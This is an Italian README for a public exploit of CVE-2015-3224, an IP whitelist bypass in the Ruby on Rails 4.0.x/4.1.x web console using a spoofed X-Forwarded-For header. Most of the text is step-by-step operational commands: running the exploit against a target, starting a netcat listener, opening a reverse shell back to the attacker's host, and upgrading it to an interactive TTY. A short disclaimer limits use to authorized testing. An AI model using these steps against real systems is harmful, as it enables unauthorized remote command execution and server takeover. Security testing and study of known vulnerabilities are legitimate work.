
Exploit della Web Console di Ruby on Rails (CVE-2015-3224)
Questo repository contiene uno script Python per sfruttare una vulnerabilità di bypass della whitelist IP nella console di sviluppo web di Ruby on Rails 4.0.x e 4.1.x. Lo script consente l'esecuzione remota di comandi su server vulnerabili.
⚠️ Disclaimer Questo script è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati. Non utilizzarlo su alcun sistema senza esplicita autorizzazione. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo script.
La console web nelle versioni vulnerabili di Ruby on Rails è pensata per scopi di sviluppo e dovrebbe essere accessibile solo da indirizzi IP fidati. Tuttavia, a causa di una gestione impropria dell'header HTTP X-Forwarded-For, un attaccante può falsificare il proprio indirizzo IP per apparire come un utente locale fidato (ad esempio 127.0.0.1 o ::1). Ciò aggira la whitelist IP e concede accesso non autorizzato alla console web, portando all'esecuzione remota di comandi.
requestsInstalla requests:
pip install requests
Clona il repository:
git clone https://github.com/Sic4rio/CVE-2015-3224
cd <nome-directory>
Rendi eseguibile lo script:
chmod +x exploit.py
Questa modalità è utile per eseguire comandi rapidi e semplici.
./exploit.py -t http://<TARGET_IP>:<PORT>
Questa è la modalità consigliata per una shell stabile e completamente interattiva.
Sulla tua macchina locale, apri un nuovo terminale e avvia un listener netcat.
nc -lvnp 9001
In un altro terminale, esegui lo script con il flag --rev-shell, fornendo il tuo IP locale (lhost) e la porta (lport).
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <TUO_IP> --lport 9001
Una connessione arriverà al tuo listener netcat. Per aggiornarla a una TTY completamente interattiva, segui questi passi nella finestra di netcat:
Ctrl+Z.stty raw -echo; fg
Invio se il prompt non riappare.reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 120
Ora hai una shell stabile e completamente funzionale!